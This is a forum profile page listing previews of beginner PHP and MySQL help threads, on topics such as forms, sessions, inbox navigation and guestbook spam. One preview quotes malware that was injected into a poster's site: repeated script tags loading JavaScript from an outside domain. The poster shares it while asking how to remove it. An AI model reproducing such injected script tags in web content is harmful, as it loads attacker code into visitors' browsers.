Posts
 
Reputation
Joined
Last Seen
Ranked #4K
Strength to Increase Rep
+0
Strength to Decrease Rep
-0
100% Quality Score
Upvotes Received
2
Posts with Upvotes
2
Upvoting Members
1
Downvotes Received
0
Posts with Downvotes
0
Downvoting Members
0
2 Commented Posts
0 Endorsements
Ranked #2K
~16.0K People Reached
Favorite Tags
Member Avatar for ishlux

Hi all, I have an inbox, if i click on the inbox which will display list of mails. now i have next button, if i click on the next button it should be possible to display the next mail with respect to the current opened mail. how to do this …

Member Avatar for its4enjoy
0
115
Member Avatar for Scooby08

I have a small problem I'm thinking.. I have a form that lists items and next to each item there is a input text field for the user to choose the quantity of each item they wish to order.. When the form is run through it spits out this array: …

Member Avatar for jerickduguran
0
12K
Member Avatar for rich69

Hello ALL: New to the forum. I have run into a problem over the past 48 hours for which I can't seem to be able to resolve. I am running an Apache 2.0 Server, with PHP, and MySQL. All servers were working fine until 48 hours ago when all hell …

Member Avatar for omoabobade
-1
302
Member Avatar for Kavitha Butchi

Hello all, I am all set to launch a website on which i have been working from months but now am afraid how safe it might be once it gets attention of hackers . As most of the code in website is in PHP,html,mysql i am posting this in this …

Member Avatar for Kavitha Butchi
0
373
Member Avatar for pandi-nissi

Sir I have created one website When i hosted in server automatically adds malware, when viewing source code following lines are automatically added <script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script> How to get out of this malware line from my website.If i remove those lines and upload also again …

Member Avatar for omol
0
115
Member Avatar for Michaelmyers

Hi, I am kinda new at PHP, but I have had nearly 1 year of learning. I'm making a Mmorpg text based game, I.E. bloody nation,lost power, I have made the home.PHP(login),login.PHP(Database script),register.PHP,Reg.PHP(Database script),Terms.PHP,Welcome.PHP,Member.PHP and loads more. I am now starting the stats database for the user e.g. Strength,Charm,intelligent and …

Member Avatar for fdh2000
0
109
Member Avatar for Tom Tolleson

Hi, guys. I've got a simple registration form that is submitting new user's contact information into a MySQL database. However, now when the form is submitted, I need the data to be sent in an email to the site's admin. Anybody know a good resource for this? Thanks! Tom Tolleson

Member Avatar for Tom Tolleson
0
416
Member Avatar for PomonaGrange

HI All, I've been trying to make a membership management type script. This script would have a database with the members contact info and which office they hold, if any. The problem I am having is I would like the script to show the president's and vice president's Contact info …

Member Avatar for langsor
0
156
Member Avatar for wiccanwolf

Hi, I was wondering if someone could look over my coding? x3 I'm really, really new to PHP (just learning, in fact) and a friend gave me this sample code, but it doesn't seem to work... could someone please help? Thank you so much. <3 Here is the full code: …

Member Avatar for god_1896
0
197
Member Avatar for god_1896

hi all; I create a php classes to insert my data into database, but it doest work, please help me with this. here is my whole code. [CODE]<?php require_once('connect.php'); class email { var $mail_id; // hotel id in emailRecord Auto_increment. var $name; // hotel name in emailRecord. var $email; // …

Member Avatar for god_1896
0
106
Member Avatar for predster

I'm new to php and I'm having some trouble with a code error. Can anyone help? I get this error: "Error in my_thread_global_end(): 1 threads didn't exit PHP Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in exception.php on line 130" This is the code: [CODE] echo "<html> …

Member Avatar for Demiloy
0
137
Member Avatar for rati

Hi all, Can someone tell me in detail what are super global variables and how are they used??

Member Avatar for Demiloy
0
280
Member Avatar for epixca

I've been wondering for the past hour if i could make a custom web extention like, .php. Would it be possible to create a .page ? (default.page) while using the php extension? Basically just renaming the web extention.

Member Avatar for Shanti C
0
110
Member Avatar for Shanti C

Hello friends... I got one error ,when my login page is loading... Fatal error:maximum execution time of 30 seconds exceeded in ../../../login.php What would i do for preventing this.. Thanks in Advance. Shanti..

Member Avatar for Demiloy
0
127
Member Avatar for danishbacker

[code=php]<? //inbox.php $data = mysql_query("SELECT * FROM mailbox WHERE `index` <= $index_end and `index` > $index_start") or die(mysql_error()); $info = mysql_fetch_array( $data ); if($info['read'] == 0) { echo "<span class=\"tableStyle\">"; $tabColor = "tableStyleNew"; } else { $tabColor = "tableStyleOld"; } //print table start echo "<table class=\"$tabColor\" bordercolor=\"#FFFFFF\" border=\"1\" cellpadding=\"0\" cellspacing=\"1\" …

Member Avatar for danishbacker
0
112
Member Avatar for Scooby08

Would anybody happen to know which of these ways is the better way to run your queries?? Would it be better to have all your SELECT queries before the actual <html> code starts, or would it be just fine throughout the page in the <body> tags?? Is one slower than …

Member Avatar for Shanti C
0
113
Member Avatar for asyieen

hi guys.....can anyone check my coding....what's wrong with my coding? the iframe that i'm trying to make, doesn't works well......when i click on the link, it goes to next page.....what i want is, when i clicked on the link, the info will come out in the same page....here's my coding.... …

Member Avatar for Demiloy
0
136
Member Avatar for theimben

is there a way for me to echo the whole database so it will display all the information held within the database?

Member Avatar for Demiloy
-1
81
Member Avatar for justted

Hello, I am trying to make the code below work so that when a member visits his/her own profile they can see the $bank_balance along with all the other details. However, when the member goes and visits someone elses profile I dont want them to be able to see the …

Member Avatar for R0bb0b
0
172
Member Avatar for Rakesh Nagekar

hello friends, Good Morning , i require code for saving path of file in database can any one provide me. Thank u Rakesh Nagekar

Member Avatar for Demiloy
0
368
Member Avatar for andrew13d

hello people. I am extremely new to web design, I have read html quite alot I need yo help however to design a database for an inventory that is accessible over the internet. Can I use MS Excel or Access for the inventory database? Which scripting language of php and …

Member Avatar for langsor
0
115
Member Avatar for webb

Can anyone explain how to change the code in a form, so that when the viewers on the web site press the submit button it goes to someoneelses email. do i insert the <a href email code? a bonus question, how do I set up a database for emails to …

Member Avatar for peter_budo
0
149
Member Avatar for Shanti C

i have one static site... can any one please help to search the whole static site with search textbox... Any ideas and help would be appreciated....

Member Avatar for nil_gh_80
-1
144
Member Avatar for knarffrank
Member Avatar for AidaPus

Hi! I am going mad, -I am not that familiar with php yet, but know a little basic programming. I am receiving a lot of spam i our guestbook [URL="http://www.galleri1897.no/viewguestbook.php"]http://www.galleri1897.no/viewguestbook.php[/URL] and wanted now to implement reCaptcha. I got the keys, and actually got it to show in the right top …

Member Avatar for AidaPus
0
110
Member Avatar for knarffrank
Member Avatar for ramseswar

i m not able get the session variables on the other pages....................... if i use session_start(); it gives error:header already sent............... kindly help me ..................i m stuck.!!!!iiii!!!!!

Member Avatar for Shanti C
0
90